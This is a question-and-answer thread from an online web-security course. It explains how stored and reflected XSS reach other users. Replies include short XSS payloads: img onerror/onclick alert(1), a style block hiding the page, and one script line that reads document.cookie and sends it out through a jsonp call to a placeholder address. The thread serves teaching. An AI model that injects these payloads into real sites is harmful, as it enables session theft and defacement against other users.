为了账号安全,请及时绑定邮箱和手机立即绑定

课程

/前端开发

/HTML/CSS

/Web安全-XSS

没太明白用户上传这些东西应该只会影响到自己的页面,怎么影响到其他用户的呢。

木有太明白。用户上传styel script iframe这些节点还有dom属性这些,收到影响的网页不是只是自己看到的么,并不会影响其它用户,不太明白黑客操作这些是怎么影响其它用户页面的呢

柚子姑娘

2017-03-25

源自:Web安全-XSS  3-1

关注问题 我要回答
1172
操作
收起

正在回答

7 回答

依然c 回答被采纳 +3 积分
2017-03-31

你这样想,假如在这个页面中,我对你进行了评论,而这个评论肯定是被服务器解析的,而且这条评论会加到数据库的。如果我在这个里面加了个广告,那么每个看到这个问题的人是不是可以看到我在这里面插入的广告。我攻击的目的是不是达到了,我是不是让别人看到了我的广告

8 回复 有任何疑惑可以回复我~
收起回答
#1

柚子姑娘 提问者

非常感谢!
2017-04-04 回复 有任何疑惑可以回复我~
#2

小学生6年级 回复 柚子姑娘 提问者

假设现在你在看一个钓鱼网站,但是你不知道。 它页面里附上了一个京东网站上iponeX只要100元的消息(同时它肯定做了很多坏事,比如说获取该用户在京东的cookie,然后发送给自己的钓鱼网站)。我们假设京东没处理这个反射xss。那么是不是它就获取到了用户在京东的一些用户信息了?
2018-07-27 回复 有任何疑惑可以回复我~
#3

油炸的馍馍 回复 柚子姑娘 提问者

<script>var cookie = document.cookie;jQuery.jsonp('布拉布拉')</script> 我是不是可以获取到你登录站点的cookie了。
2018-08-07 回复 有任何疑惑可以回复我~
Bee_Macpr0_0
2019-08-06

通过注入到数据库里,当你打开有恶意代码的页面是就会被攻击,推荐<白帽子讲web安全>

0 回复 有任何疑惑可以回复我~
收起回答
qq_浮云瘟疫_0
2018-09-08

后台没拦截,可以存在数据库中,当其他用户浏览他输入的内容时,会从接口调取数据,渲染dom

0 回复 有任何疑惑可以回复我~
收起回答
阿叶子
2018-09-01

<img src="null" onerror="alert(1)">


1 回复 有任何疑惑可以回复我~
收起回答
qq_小雨点点滴_0
2018-06-21 
<style>
    body{
        display: none !important;
    }
</style>
0 回复 有任何疑惑可以回复我~
收起回答
Y丶John4082919
2018-05-24

<img src="null" onclick="alert(1)">

0 回复 有任何疑惑可以回复我~
收起回答
菜鸟fly啊fly
2017-03-26

下面的html如果被解析也会影响到你的...

<img src="" onclick="alert(1)">


0 回复 有任何疑惑可以回复我~
收起回答

举报

0/150
提交
取消
Web安全-XSS
  • 参与学习       35584    人
  • 解答问题       71    个

从Web安全XSS的定义开始讲起,从原理到实战全方位理解XSS安全

进入课程

没太明白用户上传这些东西应该只会影响到自己的页面,怎么影响到其他用户的呢。

我要回答 关注问题
微信客服

购课补贴
联系客服咨询优惠详情

 帮助反馈 APP下载

慕课网APP
您的移动学习伙伴

 公众号

扫描二维码
关注慕课网微信公众号